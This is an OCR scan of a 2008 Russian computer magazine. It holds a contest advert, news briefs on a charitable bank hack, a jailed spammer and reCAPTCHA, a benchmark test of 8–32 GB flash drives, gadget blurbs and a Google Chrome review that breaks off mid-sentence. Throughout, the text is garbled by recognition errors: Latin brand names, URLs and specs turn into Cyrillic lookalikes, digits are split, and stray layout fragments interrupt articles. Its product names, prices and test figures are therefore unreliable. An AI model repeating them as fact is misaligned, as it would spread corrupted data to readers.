1 октября 2008 года при поддержке «М5І\І Россия» ( ѵѵѵѵѵѵ.ппзп.ги ) - 
всемирно известного развлекательного портала от корпорации Майкро- 
софт— стартует ежегодный всероссийский конкурс ЕпОаизіазІ: I пЕегпеЕ 
АѵѵагсІ, призванный собрать наиболее яркие и успешные ѵѵеЬ-проекты, 
посвященныеувлечениям молодых энтузиастов в различных областях 
жизни: от экстремального спорта до предпринимательства. 

Впервые медиакомпания батеіапсі провела ЕпШизіазІ: Іпіегпеі: АѵѵагсІ в 
2007 году и конкурс вызвал большой откликсреди десятковтысяч людей 
— создателей и разработчиков ѵѵеЬ-проектов, посвященных различным 
увлечениям. 

Участники конкурса боролись не только за звание «лучший ѵѵеЬ-проект 
среди энтузиастов», но и за главный приз премии — $25 000. В этом году 
организаторы конкурса объявили призовой фонд премии в размере $50 



000. В конкурсе ЕпЕаизіазІ: Іпіегпеі: АѵѵагсІ можетучаствовать человек 
любого пола и возраста, гражданин любой страны и вероисповедания, 
создавший сам или с группой энтузиастов собственный ѵѵеЬ- проект, 
посвященный своему увлечению, соответствующий тематикам и на- 
правлениям, заявленным на конкурс. 

С 1 октября на сайте премии еіа.тзп.ги начинается регистрация 
участников и проектов, готовых в этом году побороться за звание 
лучшего ѵѵеЬ-проекта обувлечениях! 

ЕпЕаизіазІ; Іпіегпеі: АѵѵагсІ — это не просто возможность рассказать о 
своем увлечении широкому кругу людей, но и показать свой талант 
креатора, дизайнера и ѵѵеЬ-разработчика. Одним словом, делаешьто, 
что нравится и нравится то, что делаешь! 

Адрес конкурса: еіа.тзп.ги 



Поданным Мі 
Штатах. 



>ольше 



$45 млрд 



. В ОДНИХ ЛИШЬ 



Воруем у богатых, отдаем бедным 




Широкая русская душа — штука загадочная, и русские хакеры это 
подтверждают. В Екатеринбурге неизвестные взломщики проник- 
ли в недавно установленную систему интернет-банкинга компании 
«Уральское бюро экспертизы и оценки» и перевели с ее счета 1 ,5 млн. 
рублей. Чего здесь необычного? Ато, куда именно были переведены 
деньги — 400 тысяч пошли на счет общественной организации по 
борьбе с наркотиками, 65 тысяч — всемирному фонду охраны природы 
и еще 900 тысяч отправились в Новокузнецк, в счет оплаты неких 
квартир (так как ведется следствие, подробности не раскры- 
ваются]. В «Уральском Банке Реконструкции и Развития», 
обсуживавшем компанию, свою вину полностью отрицают, 
списывая все на халатность клиентов. Статистика в этом 
вопросе говорит в пользу банка — пользователи при ра- 
боте с онлайн-банкингом частенько не соблюдают даже 
элементарных правил безопасности. Что до неизвестных 
«робин гудов» — по горячим следам никого до сих пор не 
арестовали. Похоже, они знали, что делали, и, вполне вероятно, 
мы еще услышим об их «подвигах». 



► 014 
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Спамер хочет на вободу 



Джереми Джейнс — первый спамер, осужденный за свою деятельность 
в США в 2004 году, продолжает бороться, даже пребывая в тюрьме. 
Оттуда он умудряется рассылать всевозможные письма, правда, 
теперь это большей частью бумажные прошения об апелляции, одно из 
которыхувенчалосьуспехом. Верховный суд Вирджинии признал, что 
закон о борьбе со спамом, на основании которого осудили Джереми, 
неконституционен — он нарушает право на свободу слова. Дело втом, 
чтозакон запрещает отнюдь нетолько коммерческие рассылки и имеет 




Что вы видите 
на этой картинке? 




Ученые из американского университета Карнеги-Меллон придумали 
весьма полезную и интересную вещь. Согласно ихданным, каждый 
день в Сети пользователи проходят более 1 00 млн. тестов САРТСНА 
(расшифровывают нарочно исковерканные буквы и цифры с анти -бот 
картинок], тратя на распознавание символов всего несколько секунд. 
Исследователи поняли, что можно совместить приятное с полезным, 
ведь в мире миллионы книгтребуютоцифровки, а программы распоз- 
навания текста несовершенны, особенно если речь идето выцветших 
буквах и старых книгах. Ими была создана технология геСАРТСНА, раз- 
мещенная на 40.000 сайтов в ходе эксперимента. Вместо привычного 
набора символов пользователю показывалось слово из книги, которое 
не смогла распознать машина, и контрольное слово. Процент верных 
ответов составил 99,1% (216 ошибок на 24.080 слов], вто время как 
процент ошибок среди роботов оказался равен 83,5% (3.976 ошибок]. 
Получилась отличная система — и нетолько приносящая пользу, но и 
повышающая безопасность тех сайтов, на которых используется. Вряд 
ли роботам удастся распознать то, что не «прочитало» даже специали- 
зированное ПО. 



множество нюансов, что очень не понравилось судьям и заставило их 
согласиться с преступником. Впрочем, «общительного парня» Джей- 
нса (он рассылал до 10 млн. писем в день) осудили еще и за мошенни- 
чество, ведьон рекламировал программу, при помощи которой якобы 
можно было заработать. Так что даже с учетом вопиющей «неконститу- 
ционности» означенного закона, скорый выход на волю товарищу вряд 
ли грозит. Напомню, что осудили спамера на 9 лет, а на своих рассыл- 
ках он успел заработать порядка $24 млн. 

Прогресс 

подкрался незаметно 

Из-за океана приходят новости, ясно дающие понять — электронная 
бумага скоро совсем плотно войдет в нашу жизнь. Та к два бывших 
исследователя кембриджской Лаборатории Кавендиша основали ком- 
панию РІазЕіс І_одіс, под эгидой которой теперь открылась первая на 
планете фабрика по производству дисплеев с высоким разрешением 
на гибких полимерных полупроводниках. Технологию электронных чер- 
нил Ріазбс І_одіс лицензировали у компании ЕІпк, а остальное разрабо- 
тали сами, почти 10 летназад, исследуя полимеры в Кембридже. С 2009 
года завод намеревается выпускать 1 1 млн. «гибких» дисплеев в год. А 
жители США приобщиться к высоким технологиям, смогли уже сегодня. 
Журнал Ездиіге отметил выход 75 номера с размахом — затратив 
шестизначную сумму, они заказали тираже обложкой из электронной 
бумаги. Всего 1 00.000 экземпляров, на каждом из которых приветливо 
мигает «21 век начинается сегодня :]». Плюс, в журнале можно найти 
рекламу, исполненную потой же технологии. Батареи и дисплеи нужно- 
го размера пришлосьзаказывать в Китае, в рефрижераторахтранспор- 
тировать в США, и встраивать вручную, в каждый журнал. И все равно 
заряда, ксожалению, хватит всего на 90 дней. Напомню, что энергия 
расходуется только при смене изображения, когда оно статично, 
электронные чернила довольно успешно прикидываются обычными и 
ничего не потребляют. Да, конечно, пока Ездиіге это единичный случай, 
это маркетинг и реклама, нотехнологию активно совершенствуют, и 
скоро мы наверняка увидим нечто поинтереснее мигающих обложек. 
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АЛЕКСАНДР ИВАНОВ АЛЕКСЕЙ ЕФРЕМОВ 



БЕРИ БОЛЬШЕ 
НЕСИ ДАЛЬШЕ 



|Тестовыйстенд:| 



Процессор: МоЬіІе АМБ Зетргоп, 2000 МГц 3600+ 
Системная плата: М5І М5-1414Х 
Чипсетсистемной платы: пѴІРІАбеРогсе Оо 6100, 

АМР Наттег 
Память: 1024 МБ РРП2 
Видеоадаптер: ІЧѴЮІАбеРогсе Со 6100 (256 МБ) 
Жесткий диск: ѴѴОС ѴѴБ800ВЕѴ5-00П5Т0 
Звуковой адаптер: пѴЮІА пРогсе 430 (МСР51 ) 



ТЕСТИРОВАНИЕ ФЛЕШ-ДИСКОВ БОЛЬШОЙ ЕМКОСТИ 



Пожалуй, сейчас трудно найти человека, который не знает, что такое флеш-диск. 
Да-да, тот самый «в виде брелка» и «втыкается в ЕІЗВ». Популярность этих уст- 
ройств объясняется легко: тут и максимальные компактность, и удобство пере- 
носа, и высокая емкость, и скорость работы, и надежность, и много чего еще. 

В статье мы продемонстрируем тебе результаты тестирования современных 
быстродействующих накопителей объемом от 8 до 32 Гб — и выберем тот, кото- 
рый впечатлил нас больше всего! 



В ТЕХНОЛОГИИ 

У окружающей действительности есть одно интересное свойство: люди могут 
использовать те или иные предметы и технологии, — совершенно не зная их 
внутренних механизмов. Наш сегодняшний герой - флеш-диск — отличный 
тому пример. Пользоваться им для хранения данных сможет даже ребенок, 
совершенно не разбирающийся ни в микроэлектронике, ни вустройстве 
файловых систем. Достаточно перетащить мышкой нужные файлы, извлечь 
устройство — и дело сделано. Правда, согласно народной мудрости, не все 
йогурты одинаково полезны, и различные модели накопителей имеютсвои 
особенности. Наиболее очевидны различия в емкости устройств. Сейчас 
можно встретить в обращении и весьма древние накопители объемом 
128 или даже 64 Мб, и новейшие огромные 32 Гб модели. Но что толку от 
большого объема, если данные невозможно быстро записать или прочитать? 
Поэтому вторая важнейшая хараетеристика — это быстродействие, а иначе 
говоря, время, за которое записываются и считываются данные сустройс- 
тва. Именно выяснением РЕАЛЬНЫХ характеристик быстродействия мы 
и занимаемся в этой статье. Кроме того, существует еще один интересный 
параметр, которого в эпоху господства магнитных накопителей практически 
не существовало. Речь идет о ресурсе носителя в циклахзаписи. Вопреки 
расхожему мнению отом, что в микросхемах нечему изнашиваться, ресурс 
флеш-памяти ограничен примерноста тысячами цикловзаписи. Записы- 
вая всю флешку, например, дважды вдень, мы тратим два цикла записи у 
каждой ячейки, — поделив сто тысяч на два и количество дней в году, можно 
получитьтеоретический срокжизни устройства в ІЗблет. Даже при весьма 
активном использовании флешка может оказаться долговечнее своего 
владельца! Чтобы избежать преждевременного износа какой-либо области 
диска, например, служебной, где информация постоянно обновляется, 



инженерныеумы придумали отличную уловку: внутри каждого флеш-диска 
есть специальный контроллер, который ведетучет использования ячеек 
и постоянно подсовывает для записи наиболее свежие участки. Налицо 
борьба внутреннего устройства накопителя за продление своего собствен- 
ного ресурса! 

В остальном можно сказать, что флеш-накопитель для переноса данных куда 
надежнеетрадиционного винчестера: внутри нетвращающихся с большой 
скоростью дисков с магнитным покрытием, которое могло бы быть повреж- 
дено считывающей головкой в результате удара или тряски корпуса уст- 
ройства. Информация в ячейке флеш-памяти представлена наличием (или 
отсутствием) электронов в специальных изолированных областях полупро- 
водниковых кристаллов. Они называются плавающими затворами. Причем, 
эти области способны на столько хорош о де ржать за ряд, что информация во 
флеш-памяти может храниться до десяти лет без использования для подпит- 
ки каких быто ни было внешних или внутренних источников энергии! 

0 МЕТОДИКА ТЕСТИРОВАНИЯ 

Для оценки быстродействия каждого накопителя мы провели тест, состо- 
ящий из двух частей — синтетической и практической. Первая часть была 
представлена двумя тестами: ШТипе, при помощи которого мы оценили 
среднюю скорость передач и данных и время отклика; и СгузІаЮІ5кМагк2.1 , 
обогативший нас детальной статистикой о случайных и последовательных 
процессах чтения и доступа по каждому устройству. 

Практическая частьтеста заключалась в работе с одиночным видео-файлом 
размером 3,82 Гб и деревом каталогов, содержащими аудио записи по 3-4 
Мб, и общим объемом 574 Мб. В обоих случаях измерялось время записи. 
Полученные данные мы представили на сравнительных графиках. 



► 016 
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СКОРОСТИ ПОСЛЕДОВАТЕЛЬНОГО ЧТЕНИЯ И ЗАПИСИ 




ВРЕМЯ ПЕРЕДАЧИ ТЕСТОВЫХ ФАЙЛОВ 


Тгапзсепсі ^іРІазЬ 168 и Последо- 

вательная 

ОС2 Ка11у2 ТигЬо 

ИЭІ Последо- 

пг 7 вательное 

ОС2 Оіезеі чтение 

Кіпдзіоп 0аіаТгаѵеІег400 
СогзаігѴоуадегОТ 
СогзаігѴоуадег 
А-Оаіа 5рогІКВі9 
А-Оаіа ІЧоЬіІіІу Р04 
А-Оаіа Сіаззіс Р02 

0 5 10 15 20 25 30 35 40 

Время, мс 




Тгапзсепсі ЗеіРІазИ 168 и и Запись 

Видео- 

ОС2 Ва11у2 ТигЬо И І 82 ГІ 

ОС2 Оіезеі — - 

Запись 

Кіпдзіоп йаІаТгаѵеІег 400 катологов 

саудио- 

СогзаігѴоуадегОТ ІЖГ 

СогзаігѴоуадег 

А-0а1а5рог1РВ19 

А-Оаіа ІЧоЬіІіІу Рй4 

А-Оаіа Сіаззіс Рй2 

0 2 4 6 8 10 12 

Время, мин 


Результаты измерений последовательных (линейных] скоростей чтения 


Результаты теста в реальных условиях. Чем меньше значение, тем лучше 



и записи, полученные при помощи программы СгузіаІЮізкМагк 2.1 . Чем 
больше значение, тем лучше 




ОС2 Оіезеі 



[Технические характеристики 



Такуж вышло, что ОСЕ Оіезеі показал себя, пожалуй, как наибо- 
лее сбалансированный продукт в нашем тесте. В нем сочетают- 
ся и невысокая цена, и самые миниатюрные втесте размеры. 
Его скоростные характеристики заметно выше средних. Поэ- 
тому ОСЕ Оіезеі вполне подойдет людям, находящимся в не- 
прерывном поиске идеального соотношения цены и качества. 

імя доступа для ОСЕ Оіезеі составило 0,8 секунды (весьма 
средний результат...]. Так, для записи видео-файла накопителю 
потребовалось 4 минуты и 50 секунд, а для переноса каталогов 
с музыкальными файлами ушла одна минута. 



3100 руб. 



900 руб. 



Емкость, ГБ: 16 
Габариты, мм : 60 х 17,5x8 
Материал корпуса: алюминий 
Комплектация: шнурок 
Интерфейс: 05В 2.0 



А-йаІа Сіаззіс Р02 

Технические характрпигтики«Ш 



Емкость, ГБ : 32 
Габариты, м м : 69,6 х 1 7 х 1 0 
Материал корпуса: пластик 
Комплектация: нет 
Интерфейс: 05В 2.0 



А-Оаіа ІЧоЬіІіІу РЕ)4 

Технические характеристикиг^ИИ 



Емкость, ГБ: 8 
Габариты, мм : 57 х 17,5x8 
Материал корпуса: алюминий 
Комплектация: нет 
Интерфейс: 05В 2.0 



ООО 



0 0 0 0 



Обладатель наибольшей из всех представленных в тесте устройств 
емкости (32 Гб], А-Ба1а Сіаззіс РБ2, оказался лидером по эффективной 
стоимости хранения данных. К сожалению, особыми внешними данны- 
ми этот накопитель не выделяется. Кроме цены накопитель отличился 
еще и высокими результатами скорости случайного чтения и низким, 
всего 0,5 мс временем доступа. А вотскорость работы в реальныхусло- 
виях огорчила. На копирование видео-файла ушло 9 минут и 1 0 секунд, 
а на запись музыкальных файлов — 3 минуты и 10 секунд. По совокуп- 
ности характеристик это устройство станет неплохим выбором. 



Вечно норовящий потеряться закрывающий разъем колпачоку А-Баіа 
ІЧоЬіІіІу РБ4 надежно прикреплен к корпусу металлической цепочкой. 
Устройство демонстрирует весьма заурядные скоростные характерис- 
тики: копирование видео-файла заняло десятьс половиной минут, а 
копирование каталогов с аудио — 4 минуты и 50 секунд. Как и у других 
представленных устройств А-Баіа, у А-Баіа ІЧоЬіІіІу Рй4 исключительно 
низкое время доступа, всего 0,5 мс. Это самое дешевое втесте уст- 
ройство, поэтому оно станет отличным выбором, как минимум, для двух 
категорий: студентов и школьников. 
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ВРЕМЯ ДОСТУПА 



^ Теггит 




ОС2 Ра Ну 2 ТигЬо 



[Технические характеристики^ 



3300 руб. 



Тгапзсепй ^ІРІазІі 1 68 
ОС2 Ра11у2 ТигЬо 
ОС2 йіезеі 

Кіпдзіоп ОаІаТгаѵеІег 400 
СогзаігѴоуадег ОТ 
СогзаігѴоуадег 
А-ОаІаБрогІ РВ19 
А-йаІа ЫоЬіІіІу Рй4 
А-Раіа Сіаззіс Р02 



О 0,2 0,4 

Время, мс 



Время доступа, измеренное при помощи программы НОТипе. Лидерами 
стали накопители А-Оаіа (остальные их характеристики, ксожалению, 
оказались не та к хорош и] 



Емкость, ГБ: 8 
Габариты, мм : 79 х 16x7,5 
Материал корпуса: алюминий 
Комплектация: шнурок 
Интерфейс: И5В 2.0 

•••••••••О 



видуОС4 Ра11у2 ТигЬо отличается от более простой ОС I Ра11у2 только надписью 
«ТигЬо» на лицевой панели. Но «под капотом»у заряженной версии имеются серьезные преиму- 
щества! Так, например, потестам в реальныхусловияхэтотдиск показал наилучшее быстродейс- 
твие: на копирование видео-файла размером 3,82 Гб потребовалось всего две с половиной минуты, 
а на копирование большого количества мелких аудио-файлов ушло жалких 28 секунд. Правда, каки 
положено всем нормальным «заряженным»устройствам и механизмам, цена тут довольно высока. 
За эти деньги, знаете ли, можно купить две более медленных модели, каждая из которых будет 
вместительнее в два раза. 




А-0аІа5рогІ ВВі^ 

Технические характеристики:И 



Емкость, ГБ: 8 

Габариты, мм: 72,89 х 22,53 х 12,74 
Материал корпуса: резина 
Комплектация: нет 
Интерфейс: 115В 2.0 



1200 руб. 



1600 руб. 



СогзаігѴоуадег 



[Технические характеристики^ 



Емкость, ГБ: 1 6 
Габариты, мм: 75x23 х 14 
Материал корпуса: резина 
Комплектация: шнурок, интерфейс: ИЗВ 2.0 



••••••0000 

Модель А- Баіа 5рогІ ЕВ 19 — представитель спортивного направле- 
ния, что сказалось на его конструкции. Корпус устройства защищен от 
пыли и влаги. Болеетого, он ударопрочен. В А-Оаіа отмечают, что этот 
накопитель может быть использован в системе ѴѴіпсІоѵѵз ВеасІуВоозІ: 
(ѴѴіпсІоѵѵз Ѵізіа] для ускорения работы последней. 

В тестах устройство показало себя не слишком расторопным: на 
копирование в идео- файл а ушло 1 0 минут и 20 секунд, и 4 минуты и 
50 секунд — на копирование де рева аудио-файлов. Традиционно 
для представленных в тесте устройств А-Оаіа, это изделие показало 
низкое время доступа, равное 0,5 с. 



•••••••ООО 

В нашем тестировании присутствуют две внешне одинаковые модели 
— СогзаігѴоуадег и СогзаігѴоуадег ОТ. Первая из них стоит в два раза 
дешевле, и, как показывает тестирование, пашет сильно медленнее. 
Так сказать, бюджетный вариант. В реальных условиях на копирова- 
ние в идео- файл а ушло 9,5 минут, а на копирование аудиозаписей 2 
минуты. Подкачало и время доступа. Оно оказалось максимальным в 
сравнении с конкурентами — 1 ,2 мс (по этому параметру его обошел 
только вдвое более емкий А-Оаіа Сіаззіс РБ2]. Корпус, как и у более 
дорогого варианта, —ударопрочный, пыле- и влагозащищенный, что, 
несомненно, одобрят люди, ведущие активный образ жизни. 



► 018 
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Тгапзсепгі ЦеІіРІазИ 
168 

Технические хараіаёристикиД 



Емкость, ГБ: 16 
Габариты, мм: 61 х 18,6 х 9,9 
Материал корпуса: пластик 
Комплектация: шнурок 
Интерфейс: 115В 2.0 



5000 руб. 



•••••••••О 

Линейка накопителей ТгапзсепсиеіРІазЬ 168 обладает своеобразной 
дизайнерской «фишкой». На корпусе каждого устройства, в зависимости 
от емкости, помещено изображение цветка. Скажем, для побывавшей 
у нас 1 6 Гб модели это — лотос. По скоростным характеристикам, этот 
диск получается наиболее сбалансированным. Во всех тестах устройство 
показывает отличный результат! В реальныхусловиях на переписывание 
видео-фа йлаушло две с половиной минуты, а на переписывание музы- 
кальных записей — 38 секунд. Но за все хорошее, как известно, приходит- 
ся платить. 




С о гва і г Ѵоуа д е г ОТ) 

Технические характеристикшИ 



Емкость, ГБ: 16 
Габариты, мм: 75 х 23 х 14 
Материал корпуса: резина 
Комплектация: шнурок, 115 В -удлинитель 
Интерфейс: 115В 2.0 



3200 руб. 



ОаіаТгаѵеІег400 

Технические характеристики: 



3000 руб. 



Емкость, ГБ: 16 
Габариты, мм: 66 х 18 х 1 1 

Материал корпуса: алюминий, прорезиненный пластик 
Комплектация: нет 
Интерфейс: И5В 2.0 



ООО 



•••••••ООО 

Старший из двух братьев-близнецов, СогзаігѴоуадегОТ, обладаетне 
только звучным суффиксом ОТ, но и, в целом, более высокими скоро- 
стными показателями. Впрочем, занять высокие позиции в нашем 
рейтинге ему все равно неудается: на запись большого видео-файла 
ушло 7 минут 1 5 секунд, а вот на запись большого количества мелких 
файлов времениушло даже больше, чему бюджетной модели: 2 минуты и 
40 секунд! Время доступа у Согзаіг Ѵоуадег СТ оказалось чуть ниже, чем у 
«младшего брата»; составило 1 секунду, — это второй результате конца. 



Алюминиевый корпус КіпдзЬп Ба1:аТгаѵе1.ег400 выполнен более ориги- 
нально по сравнению с большинством конкурентов — за счеттого, что 
в «походном» положении разъем закрывается поворотной наружной 
частью корпуса. Потерять «колпачок» становится невозможно в силу его 
отсутствия. В штатной комплектации производитель предлагает програм- 
мное обеспечение Мідо5упс, при помощи которого можно синхронизиро- 
вать файлы, почту и настройки ѴѴеЬ-браузера. А с утилитой 5есигеТгаѵеІег 
файлы можно шифровать. В ходе теста Кіпдзіюп Ба1:аТгаѵе1.ег400 показал 
себя твердым середняком. 



н ВЫВОДЫ 

Можно сказать, что тесты подтвердили старыйтезис: «чем мехлучше, 
тем дороже». Самыми быстрыми оказались самые дорогие накопители. 
Однако если не гоняться за скоростью, весьма емкий накопитель можно 
купить совсем недорого. Разница в цене с быстрыми моделями четы- 
рехкратная! На получение награды «Выбор редакции» в ходе тестиро- 



вания претендовали сразу два устройства: ОС2 РаИу2 ТигЬо и ТгапзсепсІ 
^іЕІазЬ 168. Они показали примерно одинаково высокие результаты во 
всехтестах. Но награда у нас одна, и чаша весов склонилась в сторону 
ОС2 Ва11у2 ТигЬо за счет более прочного алюминиевого корпуса. Награду 
«Лучшая покупка» мы отдаем 002 Оіезеі. Девайс сочетает в себе весьма 
низкую стоимость и хорошие скоростные показатели . -и- 



► 020 
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Реклама 




Зажги лето по-новому! 




Оторвись со вкусом Ргіпдіез! 
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НРТоисЬ8таг1:І<2800 

Если хочется пощупать 




1899-2099$ 


: — ■ — ■ч 

і-ЗІог І8605 

Много и быстро 



3900 руб. 



НРТоисЬБтаіі: — это та к называемый моноблоке сенсорным диспле- 
ем. Грубо говоря, это монитор, в который напихали все внутренности от 
компьютера и добавили сенсорную панель. В июле было представлено 
второе поколение ТоисЬ5таг1: 10500, но в ближайшее время в продаже 
ожидается третье поколение Ю800. В новой серии присутствуют две мо- 
дели — ТоисЬБтагІ: Ю804 и 10816. Первая оснащается процессором Соге 
2 Оио Т5850 2,16 ГГци графической картой ІМѴЮІА ОеРогсе 9300М 65, а 
вторая имеет проц Соге 2 ОиоТ81 00 с частотой 2,10 ГГц, видяху9600М 
65 и привод Віие-Пау. Обе модели оснащены сенсорным дисплеем 25,5 
дюймов и разрешением 1920x1200, ТѴ-тюнером, вебкамерой, ВІиеІооіЬ 
и устройством НР Роскеі Мебіа Огіѵе. Стаким монитором компьютер от- 
лично сканаетзателеки прекрасно будет себя чувствовать в этой роли. 
Стоимость устройства составляет 1899 долларов за младшую и 2099 за 
старшую модель. Если бюджет не дает разгуляться, то стоит обратить 
внимание на предыдущие модели 10504 и Ю506, которые стоят 1299 и 
1499 долларов соответственно. 



Если обычные внешние накопители пугаюттебя своей тормознутос- 
тью.то стоитобратить внимание на і-Зіог І5605, который является 
двухдисковым ПАЮ-накопителем. На корпусе устройства находится 
переключатель режимов работы РАЮ. Максимальная производитель- 
ность достигается в режиме РАЮ 0, когда два одинаковыхжестких 
диска работают параллельно. Также есть режим РАЮ 1, когда два диска 
работают в режиме зеркальной копии, в результате чего увеличивается 
безопасностьхранения данных. РАЮ можно отключить совсем, тогда 
оба диска будут определяться по отдельности, либо включить режим 
б ВО 0 и жесткие диски будут видны как один. Накопитель оснащен тремя 
разъемами — 115В, ЕігеѴѴіге 400 и ЕігеѴѴіге 800. Наибольшая производи- 
тельность достигается при подключении через интерфейс ЕігеѴѴіге 800, 
но не на всех компьютерах он присутствует. Модель недавно обновилась 
и обзавеласьантивибрационным силиконовым кольцом в конструкции 
крепления дисков. Это позволяетснизить шум и вибрацию. Алгоритм 
работы вентиляторов охлаждения теперь регулируется температурным 
датчиком между жесткими дисками, что тоже снижаетуровень шума. 
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8опуКо11у 




РкЬііТгаскег 


Споет и станцует 


14000 руб. 


Акселлерометр 
на пользу здоровью 



Компания 5опу начинает продажи натерритории России уникального 
танцующего плеера Роііу. С виду устройство представляет собой овал, 
помещающийся в ладонь. Для вывода звука используются неодиновые 
динамики. Плеер оснащен 6 движущимися частями, с помощью которых 
он может раскручиваться, кататься и махать в такт музыке. Атмосферы 
добавляют и два кольца подсветки, способных демонстрировать до 700 
цветов. Фотографиями сложно передать возможности плеера, поэтому 
для полноты ощущений рекомендую зайти на ѴоиТиЬе и посмотреть де- 
монстрационные ролики по запросу «5опу Роііу». Устройство оснащено 
программой Роііу СЬогодгарбег, которая анализирует музыку и создает 
под нее движения. Также можно самому обучить «зверька» новым 
движениям. Управление плеером не самое обычное — чтобы изменить 
уровень громкости или переключитьтрек, необходимо покрутить одно из 
колесиков, а для перевода в режим воспроизведения в случайном по- 
рядке устройство нужно встряхнуть. В режиме воспроизведения плеер 
работает до 5 часов, а треки можно загружать удаленно через Віиеіооіб. 
Роііу выпускается в двух цветах (черный и белый] и к моменту выхода 
журнала уже должен быть на прилавках. 



РііЬііТгаскег — это маленькое устройство, которое закрепляется на одеж- 
де и мониторитфизическую активность носителя. С помощью встроенно- 
го акселлерометра измеряется количество шагов, пройденное рассто- 
яние и сожженные калории. Если же устройство прицепить на трусы и 
лечьс ним спать, то смониторится количество ночных походов кунитазу, 
сколько пришлось ворочаться перед тем, какзаснуть и сколько вообще 
времени человек спокойно спал. Полученные данные синхронизируются 
с компьютером, а затем отправляются на сайт ЕіЬІІ.сот , где они подвер- 
гаются машинному анализу, по результатам которого составляются общие 
рекомендации. За дополнительную плату данные будут просматриваться 
специалистами, которые составят индивидуальную программу похуде- 
ния. Без подзарядки брелок проживет порядка 10 дней. В данный момент 
устройство еще не выпущено на рынок и конечная версия будет отличать- 
ся от представленной на фотографиях наличием небольшого дисплея, на 
котором будет изображен цветок. Если делать зарядку и вести активный 
образжизни.то цветок будет распущен, а если наоборот — то повядший. 
Сейчасуже можно сделать предварительный заказ, а официальные 
продажи начнутся ближе к новогодним праздникам. 
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НОВЫЙ БРАУЗЕР ОТ С006І.Е: ИЗНУТРИ И СНАРУЖИ 



на официальном блоге появилось сообщение: да, разр 
на следующий день вышла бета-версия. И это, мы тебе ск; 



раузер — это обычно всерьез и надолго. Выбрав один, не- 
скоро соберешься что-либо менять. Нотолько не в случае с 
Ооодіе СЬготе. Анонса такого браузера ожидали миллионы 
людей. При всей своей простоте и в чем-то даже убогости, 
в первые дни после выхода он сумел занять достаточно существенную 
долю рынка (около 1 % глобального рынка, а на некоторых ресурсах — и 
до 20%]. Предлагаю изучить новинку стрехточекзрения — пользовате- 
ля, веб-разработчика и хакера. 

В ВПЕЧАТЛЕНИЯ ПОЛЬЗОВАТЕЛЯ 

Процедура инсталляции довольно нетипична. Для загрузки с офсайта пред- 
лагается небольшой установщик, который скачивает из интернета основной 
дистрибутив (размер пакета — около 25 Мб]. Забавно, что установщик не 
предлагаетвыбратьдиректориюдля установки и размещает файлы строго 
в С : \ІІзегз\\АррВаСа\Ьоса1\0оод1е\С]ігоше\Арр1ісаіііоп. Окно 
браузера простое, но приятное. Каждая страница открывается в собственной 
вкладке табе. В отличие от Рігеіюх и других браузеров, адресная строка и 
элементы управления размещаются внутри каждой вкладки. Это достаточно 
спорное решение, однако я бы не сказал, что оно неудобно, скорее, непри- 
вычно. Учитывай еще одну особенность — закрытие последней вкладки в 
окне приведеткего полному закрытию. С непривычки это можетсмутить. 



[ТЕХНИЧЕСКИЕ ДЕТАЛИ 



Версия: 0 . 2 . 149.29 сборка 1798 
Сайт: Ь«р://ѵѵѵѵѵѵ.доодІе.сот/сЬготе 
Размер: 450 Кб — 25 Мб 

Операционная система: ѴѴІП 32 (ХРи выше), 1_тихподѴѴте 

Лицензия: ВБй 

Открытый код: да, Шр://сос1е.доодІе.сот/сЬготіит 
Поддержка : НТМІ_ 4/С55 2 (частично С55 зЬ РІазЬ, ^ѵаБсгірІ 
Движок: ѴѴеЬКіІ + Ѵ8 ЫЗ-епдіпе) 

Плагины: пока нет, встроенный боодіебеагз 

Адресной строке уделено особое внимание: элементы 0ПІ_ раскра- 
шиваются разными цветами. По аналогии с Рігеіюх, поиск работает 
прямо из адресной строки: при этом использует и результаты поиска в 
Пугл, и данные из истории посещений. 

А если ты введешь адресодногоизсервисовсамогобоодіе.то 
в числе прочих вариантов будет предложено поискать на этом 
ресурсе. 
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Любую страницу можно быстро занести в закладки, однако 
для них браузеру очень недостает развитых инструментов 
управления. Максимум, что возможно — импортировать 
букмарки из другихустановленных браузеров, расположить 
их на специальной панели или вынести в дополнительные 
папки. Здесь очень пригодилась бы интеграция с серви- 
сами закладок, тем более, что у Соодіе он есть (Вооктагкз, 
мѵууѵ.доодІе.сот/Ьоокппагкз ]. Радует, что в браузер изна- 
чально встроен предпросмотр часто посещаемых страниц (в 
виде картинок-превью, отображаемых при открытии новой 
вкладки). В Орега есть аналогичный функционал, а в Рігеіюх 
это решается плагином Раз! Оіаі. 

Думаю, тебе будет интересен режим инкогнито — безопас- 
ный веб-серфинг, когда никакие данные о посещаемых 
страницах не сохраняются ни в истории, ни в кеше, ни где 
бы то ни было. Так что можно спокойно рассматривать стра- 
ницы бывших подружек в социальных сетях на компьютере 
жены или шефа и быть уверенным, что никто ничего не 
заметит. По слухам, аналогичный функционал планируется 
и в следующих версиях браузера Іпіегпеі Ехріогег. 

Интернет немыслим без желания сохранить себе что- 
нибудь на комп — загрузить новые дистрибутивы ПО, 
аудио-файлы или хотя бы тоже самое порно. В Сбготе 
встроен достаточно простой загрузчик, который может сразу 
начать загружать да иные, без каких-либо окон запроса. 

Сам процесс загрузки будет отображаться на специальной 
панели внизу страницы (привязана ктой страничке, откуда 
начата загрузка — переключившись в другую вкладку, ты не 
увидишь, что что-то загружается, а это неудобно). Здесь еще 
есть недоработки, например, не всегда срабатываетопция 
автоматического открытия определенныхтипов файлов. Так 
что для тех, кто часто и много загружает, лучшим выбором 
пока будет именно Рігеіюх + какой-либо плагин для загрузки, 
например, РІазЬСоР Зато — оченьудобная страница исто- 
рии загрузок, где выводятся в хронологическом порядке все 
твои загрузки, и присутствует поиск. Кстати, все служебные 
функции, вроде истории просмотров, закладки, загрузки 
оформлены в виде отдельных страниц во вкладках. Честно 
говоря, сложно понять — это локальная страница програм- 
мы или же окно очередного веб-сервиса. Вот она, подлин- 
ная интеграция с вебом... 

И, для любителей нового, расскажу еще об одной встроен- 
ной функции СЬготе, а именно — создание сіезкіор-прило- 
жения излюбой вкладки. Достаточно всего лишь выбрать 
в меню страницы «Создать ярлыки веб-приложения» и на 
рабочем столе, в быстром запуске и в меню «Пуск» появятся 



обычные ярлыки новой программы. Для примера, пусть это 
будет 0 так. Кликнув по любому из нихды запустишь новое 
окно приложения, где будет открыта страница (Зтаіі-а. 
Ничего не будет выдавать, что это все то же окно браузера 

— нетнитабов, ни адресной строки, ни других элементов 
меню. Это оченьудобно, нотолько втех сервисах, которые 
изначально проектировались как«одностраничные». 

Рели вся работа с приложением или сайтом может про- 
исходить в пределах одного окна, а новая информация 
загружается в фоновом режиме АкАХ-ом, то все отлично. Но 
